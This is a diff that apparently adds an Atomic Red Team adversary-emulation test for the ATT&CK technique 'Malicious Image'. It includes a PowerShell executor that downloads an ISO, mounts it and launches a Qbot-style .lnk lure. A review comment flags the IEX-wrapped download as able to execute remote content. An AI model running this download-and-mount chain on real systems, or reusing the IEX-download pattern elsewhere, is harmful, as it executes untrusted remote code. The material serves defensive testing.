diff --git a/atomics/T1204.003/T1204.003.yaml b/atomics/T1204.003/T1204.003.yaml
new file mode 100644
index 00000000..03f9c840
--- /dev/null
+++ b/atomics/T1204.003/T1204.003.yaml
@@ -0,0 +1,21 @@
+attack_technique: T1204.003
+display_name: "User Execution: Malicious Image"
+atomic_tests:
+- name: Malicious Execution from Mounted ISO Image
+ description: Adversaries may rely on a user running a malicious image to facilitate execution
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso")
+ Mount-DiskImage -ImagePath "$env:TEMP\qbot-test.iso"
+ $mountedpath = (Get-DiskImage -ImagePath "$env:TEMP\qbot-test.iso" | Get-Volume).DriveLetter
+ $finalpath = $mountedpath + ":\"
+ cd $finalpath
+ .\calc.exe.lnk
+ cleanup_command: |-
+ start-sleep -s 5
+ stop-process -Name "Calculatorapp" -Force
+ dismount-diskimage -ImagePath "$env:TEMP\qbot-test.iso"
+ name: powershell
+ elevation_required: true
\ No newline at end of file
diff --git a/atomics/T1204.003/src/qbot-test.iso b/atomics/T1204.003/src/qbot-test.iso
new file mode 100644
index 00000000..23b2b11b
Binary files /dev/null and b/atomics/T1204.003/src/qbot-test.iso differ
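Review bot: The first line of the executor command, `IEX (iwr "https://…/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso")`, wraps a file download in Invoke-Expression for no reason: with -OutFile the request returns nothing, so IEX is a no-op today, and if -OutFile were ever dropped the test would execute whatever the URL served instead of saving it. It should read `Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso"`. The cleanup_command dismounts the image but never deletes the downloaded ISO, so `Remove-Item "$env:TEMP\qbot-test.iso" -Force -ErrorAction SilentlyContinue` belongs after dismount-diskimage; and because the command ends with `cd $finalpath`, a cleanup that runs in the same session would still have the mounted volume as its working directory, so a `cd $env:TEMP` before dismounting looks safer (this depends on how the executor runs cleanup, which the hunk does not show). Other tests in this repository appear to place downloads in a `dependencies` block with `prereq_command`/`get_prereq_command` rather than inside the executor command; following that convention would make the test fail clearly when the ISO is unavailable.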